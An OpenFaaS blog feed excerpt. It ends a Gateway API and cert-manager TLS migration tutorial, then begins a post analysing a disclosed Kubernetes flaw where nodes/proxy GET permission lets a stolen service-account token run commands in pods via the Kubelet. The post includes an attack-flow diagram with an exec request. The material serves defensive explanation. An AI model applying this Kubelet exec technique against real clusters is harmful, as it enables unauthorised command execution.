<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">GatewayClass</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">eg</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">controllerName</span><span class="pi">:</span> <span class="s">gateway.envoyproxy.io/gatewayclass-controller</span>
</code></pre></div></div>

<p>Verify that the GatewayClass is accepted:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get gatewayclass

NAME    CONTROLLER                                      ACCEPTED
eg      gateway.envoyproxy.io/gatewayclass-controller    True
</code></pre></div></div>

<h2 id="install-cert-manager">Install cert-manager</h2>

<p><a href="https://cert-manager.io">cert-manager</a> automates TLS certificate management in Kubernetes. It integrates with the Gateway API to automatically create certificates for Gateway listeners.</p>

<p>Install cert-manager with Gateway API support enabled:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm upgrade <span class="nt">--install</span> cert-manager oci://quay.io/jetstack/charts/cert-manager <span class="se">\</span>
  <span class="nt">--namespace</span> cert-manager <span class="se">\</span>
  <span class="nt">--create-namespace</span> <span class="se">\</span>
  <span class="nt">--version</span> v1.19.3 <span class="se">\</span>
  <span class="nt">--set</span> crds.enabled<span class="o">=</span><span class="nb">true</span> <span class="se">\</span>
  <span class="nt">--set</span> config.apiVersion<span class="o">=</span><span class="s2">"controller.config.cert-manager.io/v1alpha1"</span> <span class="se">\</span>
  <span class="nt">--set</span> config.kind<span class="o">=</span><span class="s2">"ControllerConfiguration"</span> <span class="se">\</span>
  <span class="nt">--set</span> config.enableGatewayAPI<span class="o">=</span><span class="nb">true</span>
</code></pre></div></div>

<p>You can run <code class="language-plaintext highlighter-rouge">crane ls jetstack/cert-manager</code> to see alternative versions.</p>

<blockquote>
  <p>Note: The Gateway API CRDs must be installed before cert-manager starts.
If you installed them after cert-manager, restart the controller with: <code class="language-plaintext highlighter-rouge">kubectl rollout restart deployment cert-manager -n cert-manager</code></p>
</blockquote>

<h2 id="create-a-cert-manager-issuer">Create a cert-manager Issuer</h2>

<p>Create an Issuer in the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace that uses Let’s Encrypt with an HTTP-01 challenge. cert-manager will use this Issuer to automatically obtain certificates for any Gateway listener that references it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">cert-manager.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Issuer</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">acme</span><span class="pi">:</span>
    <span class="na">server</span><span class="pi">:</span> <span class="s">https://acme-v02.api.letsencrypt.org/directory</span>
    <span class="na">privateKeySecretRef</span><span class="pi">:</span>
      <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-prod-account-key</span>
    <span class="na">solvers</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">http01</span><span class="pi">:</span>
        <span class="na">gatewayHTTPRoute</span><span class="pi">:</span>
          <span class="na">parentRefs</span><span class="pi">:</span>
          <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
            <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
            <span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
</code></pre></div></div>

<p>Notice that the solver uses a <a href="https://cert-manager.io/docs/configuration/acme/http01/#configuring-the-http-01-gateway-api-solver"><code class="language-plaintext highlighter-rouge">gatewayHTTPRoute</code></a> instead of the <code class="language-plaintext highlighter-rouge">ingress</code> class used in a traditional Ingress-based setup. This tells cert-manager to create a temporary HTTPRoute attached to a Gateway to solve the ACME HTTP-01 challenge.</p>

<p>The <code class="language-plaintext highlighter-rouge">parentRefs</code> field points to the Gateway we’ll create in the next step, so cert-manager knows which Gateway to attach the challenge route to. The referenced Gateway must have a listener on port 80, since the HTTP-01 challenge requires Let’s Encrypt to reach a well-known URL over plain HTTP. In our setup, we will include this HTTP listener directly on the same Gateway that serves HTTPS traffic. Alternatively, the Issuer could reference a separate Gateway created specifically for solving HTTP-01 challenges, as long as that Gateway has a port 80 listener.</p>

<p>If you’re setting this up for the first time, consider using the staging issuer to avoid rate limits. Change the server URL to <code class="language-plaintext highlighter-rouge">https://acme-staging-v02.api.letsencrypt.org/directory</code> and the issuer name to <code class="language-plaintext highlighter-rouge">letsencrypt-staging</code>.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">cert-manager.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Issuer</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-staging</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">acme</span><span class="pi">:</span>
    <span class="na">server</span><span class="pi">:</span> <span class="s">https://acme-staging-v02.api.letsencrypt.org/directory</span>
    <span class="na">privateKeySecretRef</span><span class="pi">:</span>
      <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-staging-account-key</span>
    <span class="na">solvers</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">http01</span><span class="pi">:</span>
        <span class="na">gatewayHTTPRoute</span><span class="pi">:</span>
          <span class="na">parentRefs</span><span class="pi">:</span>
          <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
            <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
            <span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
</code></pre></div></div>

<h2 id="expose-the-openfaas-gateway-with-tls">Expose the OpenFaaS gateway with TLS</h2>

<h3 id="create-the-gateway-object">Create the Gateway object</h3>

<p>The Gateway (API Gateway, not OpenFaaS Gateway) resource defines a LoadBalancer with listeners for your domains. When a Gateway is created, the referenced GatewayClass controller provisions or configures the underlying load balancing infrastructure. The <code class="language-plaintext highlighter-rouge">gatewayClassName</code> field is required and must reference an existing GatewayClass - in our case the <code class="language-plaintext highlighter-rouge">eg</code> GatewayClass we created earlier for Envoy Gateway.</p>

<p>Start with a single HTTPS listener for the OpenFaaS gateway:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">annotations</span><span class="pi">:</span>
    <span class="na">cert-manager.io/issuer</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">gatewayClassName</span><span class="pi">:</span> <span class="s">eg</span>
  <span class="na">listeners</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">http</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">80</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTP</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway-cert</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">cert-manager.io/issuer</code> annotation tells cert-manager to watch this Gateway and automatically create a Certificate resource for each HTTPS listener. The certificate will be stored in the Secret referenced by <code class="language-plaintext highlighter-rouge">certificateRefs</code>.</p>

<p>The first listener on port 80 is the HTTP listener referenced by the Issuer we created earlier to resolve HTTP-01 challenges.</p>

<p>The second listener serves HTTPS traffic for <code class="language-plaintext highlighter-rouge">gw.example.com</code> on port 443. The <code class="language-plaintext highlighter-rouge">tls.mode: Terminate</code> setting means TLS is terminated at the Gateway and traffic is forwarded to the backend as plain HTTP. The <code class="language-plaintext highlighter-rouge">certificateRefs</code> field references the Secret where cert-manager will store the issued certificate.</p>

<h3 id="create-the-dns-record">Create the DNS record</h3>

<p>Find the external IP address assigned to the Gateway:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get gateway <span class="nt">-n</span> openfaas openfaas-gateway

NAME               CLASS   ADDRESS          PROGRAMMED
openfaas-gateway   eg      203.0.113.10     True
</code></pre></div></div>

<p>Create an A record (or CNAME if you see a hostname) in your DNS provider pointing <code class="language-plaintext highlighter-rouge">gw.example.com</code> to this address.</p>

<h3 id="verify-the-certificate">Verify the certificate</h3>

<p>Check that cert-manager has issued the certificate. Note that it might take a while for DNS to propagate and the certificate to become ready.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get certificate <span class="nt">-n</span> openfaas

NAME                     READY   SECRET                   AGE
openfaas-gateway-cert    True    openfaas-gateway-cert    2m
</code></pre></div></div>

<p>If the certificate doesn’t show Ready as True, then you can check the logs of cert-manager’s controller, and also its various Custom Resources.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl logs <span class="nt">-n</span> cert-manager deploy/cert-manager
</code></pre></div></div>

<p>Use either the <code class="language-plaintext highlighter-rouge">get</code> or <code class="language-plaintext highlighter-rouge">describe</code> verb for more information about the resources.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get certificaterequests <span class="nt">-n</span> openfaas
kubectl get issuers <span class="nt">-n</span> openfaas
kubectl get orders <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="create-the-httproute">Create the HTTPRoute</h3>

<p>While the Gateway defines listeners and TLS termination, it is the HTTPRoute that binds hostnames and paths to backend services.</p>

<p>Create an HTTPRoute that routes traffic from the Gateway to the OpenFaaS gateway service:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">parentRefs</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">hostnames</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
  <span class="na">rules</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">matches</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span>
        <span class="na">type</span><span class="pi">:</span> <span class="s">PathPrefix</span>
        <span class="na">value</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">timeouts</span><span class="pi">:</span>
      <span class="c1"># Should match gateway.writeTimeout in the OpenFaaS Helm chart.</span>
      <span class="c1"># Envoy's default of 15s is too short for most functions.</span>
      <span class="na">request</span><span class="pi">:</span> <span class="s">10m</span>
    <span class="na">backendRefs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
      <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">timeouts.request</code> field sets the maximum duration for the gateway to respond to an HTTP request. This value should be set to match the <code class="language-plaintext highlighter-rouge">gateway.writeTimeout</code> configured in the OpenFaaS Helm chart. If omitted, Envoy Proxy uses a default of 15 seconds which will cause functions with longer execution times to time out at the proxy level. See the <a href="https://docs.openfaas.com/tutorials/expanded-timeouts/">expanded timeouts guide</a> for details on configuring all timeout values.</p>

<p>The <code class="language-plaintext highlighter-rouge">parentRefs</code> field defines which Gateway this route wants to be attached to, in this case the <code class="language-plaintext highlighter-rouge">openfaas-gateway</code> Gateway. The <code class="language-plaintext highlighter-rouge">hostnames</code> field filters requests by the Host header before rules are evaluated, ensuring only requests for <code class="language-plaintext highlighter-rouge">gw.example.com</code> are matched. The <code class="language-plaintext highlighter-rouge">backendRefs</code> field defines the backend service where matching requests are forwarded - in this case the OpenFaaS <code class="language-plaintext highlighter-rouge">gateway</code> service on port 8080.</p>

<h3 id="attempt-to-reach-a-function">Attempt to reach a function</h3>

<p>Using <code class="language-plaintext highlighter-rouge">kubectl</code> we can deploy a function from the OpenFaaS store, and invoke it via curl.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli generate <span class="nt">--from-store</span> <span class="nb">env</span> | kubectl apply <span class="nt">-f</span> -

curl <span class="nt">-i</span> https://gw.example.com/function/env
</code></pre></div></div>

<h3 id="log-in-to-openfaas">Log in to OpenFaaS</h3>

<p>Once the certificate is issued and DNS has propagated, you can log in and use it as you would normally through Ingress.</p>

<p>For instance, if you’re not using IAM for OpenFaaS, you can simply run:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">OPENFAAS_URL</span><span class="o">=</span>https://gw.example.com

<span class="nv">PASSWORD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas basic-auth <span class="se">\</span>
  <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s2">"{.data.basic-auth-password}"</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="p">;</span> <span class="nb">echo</span><span class="si">)</span>
<span class="nb">echo</span> <span class="nt">-n</span> <span class="nv">$PASSWORD</span> | faas-cli login <span class="nt">--username</span> admin <span class="nt">--password-stdin</span>

faas-cli list
</code></pre></div></div>

<h2 id="add-the-openfaas-dashboard">Add the OpenFaaS dashboard</h2>

<p>The <a href="https://docs.openfaas.com/openfaas-pro/dashboard/">OpenFaaS Dashboard</a> is an essential add-on for OpenFaaS Standard and OpenFaaS for Enterprises.</p>

<p>This is where we start to see some of the differences between Gateway API and Ingress.</p>

<p>With Ingress, the Ingress Controller has one IP, and routes all traffic to hosts and paths defined on Ingress records.</p>

<p>With Gateway API, you have two things to update and maintain, and to keep in sync: both the Gateway and the HTTPRoute objects must include the desired hostname i.e. <code class="language-plaintext highlighter-rouge">dashboard.example.com</code>.</p>

<h3 id="add-a-listener-to-the-gateway">Add a listener to the Gateway</h3>

<p>Add a second HTTPS listener for the dashboard domain to the existing Gateway:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">annotations</span><span class="pi">:</span>
    <span class="na">cert-manager.io/issuer</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">gatewayClassName</span><span class="pi">:</span> <span class="s">eg</span>
  <span class="na">listeners</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">http</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">80</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTP</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway-cert</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">dashboard</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">dashboard.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-dashboard-cert</span>
</code></pre></div></div>

<p>cert-manager will detect the new HTTPS listener and automatically create a second Certificate for the dashboard domain.</p>

<h3 id="create-the-dns-record-for-the-dashboard">Create the DNS record for the dashboard</h3>

<p>Create an A or CNAME record for <code class="language-plaintext highlighter-rouge">dashboard.example.com</code> pointing to the same external IP as the Gateway.</p>

<p>Verify both certificates are ready:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get certificate <span class="nt">-n</span> openfaas

NAME                      READY   SECRET                    AGE
openfaas-gateway-cert     True    openfaas-gateway-cert     10m
openfaas-dashboard-cert   True    openfaas-dashboard-cert   2m
</code></pre></div></div>

<p>Note that it might take a while for the DNS to propagate and the certificate to get ready.</p>

<h3 id="create-the-httproute-for-the-dashboard">Create the HTTPRoute for the dashboard</h3>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-dashboard</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">parentRefs</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">hostnames</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s2">"</span><span class="s">dashboard.example.com"</span>
  <span class="na">rules</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">matches</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span>
        <span class="na">type</span><span class="pi">:</span> <span class="s">PathPrefix</span>
        <span class="na">value</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">timeouts</span><span class="pi">:</span>
      <span class="c1"># Should match gateway.writeTimeout in the OpenFaaS Helm chart.</span>
      <span class="c1"># Envoy's default of 15s is too short for most functions.</span>
      <span class="na">request</span><span class="pi">:</span> <span class="s">10m</span>
    <span class="na">backendRefs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">dashboard</span>
      <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span>
</code></pre></div></div>

<p>You should now be able to access the dashboard at <code class="language-plaintext highlighter-rouge">https://dashboard.example.com</code>.</p>

<p>That concludes the walk-through</p>

<h2 id="final-thoughts-and-next-steps">Final thoughts and next steps</h2>

<p>If you’re not sure whether to try to hang onto Ingress with one of the Ingress Controllers that’s still being maintained like Traefik, or to migrate to the Gateway API right now. We’d strongly encourage you to pick a sensible default like Envoy Gateway, and Gateway API. It will require some initial setup to migrate, but once it’s in place, we don’t expect you to need to change it much.</p>

<p>In summary we covered:</p>

<ul>
  <li>The double whammy of Ingress being sidelined by the community as a “legacy” technology, and ingress-nginx being deprecated with a very short notice period.</li>
  <li>A sensible default for implementing Gateway API with Envoy Gateway.</li>
  <li>How to map Gateway API resources to the OpenFaaS gateway and dashboard, including TLS termination from Let’s Encrypt.</li>
</ul>

<p>If taking on Gateway API feels like too much right now, do not be tempted to continue using ingress-nginx in its unmaintained state. It’s had severe security issues in the recent past like <a href="https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/">CVE-2025-1974</a> on March 24 2025. Instead, you can get the basic routing, load balancing and TLS termination from Traefik. We’ve updated our <a href="https://docs.openfaas.com/reference/tls-openfaas/">existing guide on Ingress</a> to reflect this.</p>

<p>For questions, comments and suggestions, reach out to us via your existing support channels, or through the form on our <a href="https://www.openfaas.com/pricing/">Pricing page</a>.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="ingress" /><category term="tls" /><category term="gateway-api" /><summary type="html"><![CDATA[Learn how to migrate OpenFaaS to the Kubernetes Gateway API with TLS certs from Let's Encrypt]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-02-gwapi/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-02-gwapi/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?</title><link href="https://www.openfaas.com/blog/kubernetes-node-proxy-rce/" rel="alternate" type="text/html" title="How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?" /><published>2026-01-27T00:00:00+00:00</published><updated>2026-01-27T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/kubernetes-node-proxy-rce</id><content type="html" xml:base="https://www.openfaas.com/blog/kubernetes-node-proxy-rce/"><![CDATA[<p>We spin up a temporary Kubernetes cluster to explore and address a newly surfaced security vulnerability in Kubernetes.</p>

<p>Security researcher Graham Helton recently disclosed an interesting Kubernetes RBAC behavior: <a href="https://grahamhelton.com/blog/nodes-proxy-rce">nodes/proxy GET permissions allow command execution in any Pod</a>. The Kubernetes Security Team closed this as “working as intended,” but it’s worth understanding the implications.</p>

<p>OpenFaaS is a popular serverless platform for running functions on Kubernetes, and is used by individual product teams, and for multi-tenant environments.</p>

<p>As a preamble, we should say that this is not specific to OpenFaaS, but should be well understood by any operator configuring OpenFaaS for production use.</p>

<p>In this post, we’ll:</p>

<ol>
  <li>Spin up a K3s cluster in a <a href="https://slicervm.com">SlicerVM</a> microVM and Firecracker. You could also use a public cloud VM like AWS EC2.</li>
  <li>Install OpenFaaS Pro with <code class="language-plaintext highlighter-rouge">clusterRole: true</code> (which grants <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>)</li>
  <li>Use the service account’s token to execute commands in any Pod by connecting directly to the Kubelet on port 10250.</li>
  <li>Whilst unexpected, we’ll discuss why this isn’t the risk you might think it is.</li>
</ol>

<h2 id="the-vulnerability-in-brief">The vulnerability in brief</h2>

<p>This capability only becomes meaningful if a specific internal Kubernetes service account’s token becomes compromised and a user with sufficient privileges can reach the Kubelet API - conditions that should not exist in a well-run production cluster.</p>

<p>Briefly speaking, this vulnerability requires:</p>

<ul>
  <li>Possession of a Kubernetes service account token with nodes/proxy (GET) access</li>
  <li>Network reachability to a node’s Kubelet server on port 10250</li>
</ul>

<p>This is not a remote unauthenticated exploit, and it is not reachable via the OpenFaaS API. It requires an already-compromised Kubernetes service account token and network path to the Kubelet.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌─────────────────────────────────────────────────────────────────────────┐
│                         The Attack Flow                                 │
└─────────────────────────────────────────────────────────────────────────┘

  ┌───────────────┐         ┌──────────────────┐         ┌──────────────┐
  │   Attacker    │         │   K8s API Server │         │    Kubelet   │
  │ (with token)  │         │                  │         │  (port 10250)│
  └───────┬───────┘         └────────┬─────────┘         └──────┬───────┘
          │                          │                          │
          │  1. GET nodes/proxy      │                          │
          │  ────────────────────►   │                          │
          │                          │                          │
          │  ✓ Authorized (GET)      │                          │
          │  ◄────────────────────   │                          │
          │                          │                          │
          │  2. WebSocket upgrade to Kubelet ──────────────────►│
          │     (still a GET!)                                  │
          │                          │                          │
          │  3. /exec/namespace/pod?command=id ────────────────►│
          │     (exec via WebSocket)                            │
          │                          │                          │
          │  ✓ Kubelet allows it     │                          │
          │  ◄──────────────────────────────────────────────────│
          │     (sees GET, not exec)                            │
          │                          │                          │
          ▼                          ▼                          ▼

  The Kubelet checks the HTTP method (GET) not the action (exec)
  ═══════════════════════════════════════════════════════════════
</code></pre></div></div>

<p>The Kubelet makes authorization decisions based on the HTTP method of the initial WebSocket handshake (<code class="language-plaintext highlighter-rouge">GET</code>), not the operation being performed (<code class="language-plaintext highlighter-rouge">exec</code>). Since WebSockets require an HTTP GET to establish the connection, a service account with only <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> can execute commands in any Pod by connecting directly to the Kubelet on port 10250.</p>

<p>According to Helton, his search found 69 affected publicly listed Helm charts including: Prometheus, Datadog, Grafana, and OpenFaaS when deployed with <code class="language-plaintext highlighter-rouge">clusterRole: true</code>. The common theme with each of these, is that they gather key metrics and log data from individual nodes in order to provide value to the end user - monitoring, or in the case of OpenFaaS, both monitoring and autoscaling.</p>

<h3 id="a-note-on-alerts-from-cve-scanners-in-general">A note on alerts from CVE scanners in general</h3>

<p>We often get emails to our support inbox from customers who are concerned about automated vulnerability reports where a CVE is found in a base image or the Go runtime. That’s normal, and having a defined process for fixes and turn-around is important for any vendor that deals with risk-sensitive enterprise customers. Typically, the CVE in question will be a false positive - yes it is present, however it is not exercised in any way in the codebase. We’ll sometimes nudge customers to run <code class="language-plaintext highlighter-rouge">govulncheck</code> against the binary to see that for themselves.</p>

<p>That doesn’t mean we ignore CVEs that concern customers, we’re very responsive, however, we also don’t want them to be distracted about false positives.</p>

<h1 id="tutorial">Tutorial</h1>

<h3 id="our-lab-setup">Our lab setup</h3>

<p>We’ll use <a href="https://slicervm.com">SlicerVM</a> to spin up a temporary Kubernetes cluster in a Firecracker microVM. You could also use a public Kubernetes service or your VM provider of choice.</p>

<p>This is what it’ll look like, pretty much everything is fully installed and setup, including the login step for <code class="language-plaintext highlighter-rouge">faas-cli</code> and configuring <code class="language-plaintext highlighter-rouge">kubectl</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Host                        Firecracker microVM
  │                                  │
  │  slicer up k3s-rce.yaml          │
  │─────────────────────────────────►│
  │                                  │
  │  .secrets/LICENSE ──(VSOCK)─────►│ /run/slicer/secrets/
  │                                  │
  │                                  │  userdata.sh starts
  │                                  │        │
  │                                  │        ▼
  │                                  │  ┌──────────┐
  │                                  │  │  arkade  │ get kubectl, helm,
  │                                  │  └────┬─────┘ faas-cli, k3sup...
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │  k3sup   │ install K3s
  │                                  │  └────┬─────┘
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │   helm   │ install OpenFaaS Pro
  │                                  │  └────┬─────┘ (clusterRole=true)
  │                                  │       │
  │                                  │       ▼
  │                                  │  Ready! K3s + OpenFaaS
  │                                  │
  │  slicer vm shell ───────────────►│  ubuntu@k3s-rce-1:~$
  │                                  │
</code></pre></div></div>

<p><a href="https://slicervm.com">SlicerVM</a> is a tool we’ve used internally since around 2022 for building out Kubernetes clusters on bare-metal, on our own hardware. Sometimes, that’s a mini PC in the office, and at other times, it’s a larger, public-facing bare-metal server from a vendor like Hetzner. It gets around a few prickly issues with cloud-based K8s like: excessive cost, slow setup, and a very limited number of Pods per machine.</p>

<p>In late 2025, <a href="https://blog.alexellis.io/slicer-bare-metal-preview/">we released it for general consumption</a>, with an additional mode to launch disposable VMs for automation and coding agents and have been building up an engaged community of users on our Discord server.</p>

<p>The point is: from the moment a customer support request comes in, we can have a full installation of OpenFaaS and K3s within less than a minute. This is a key part of our customer support process - rapid responses, fast iterating on new features, with higher performance for lower cost than public cloud.</p>

<p>Leave 1-2 clusters running on AWS EKS for some research? You may find your manager breathing down your neck about a mysterious 2000 USD AWS bill.</p>

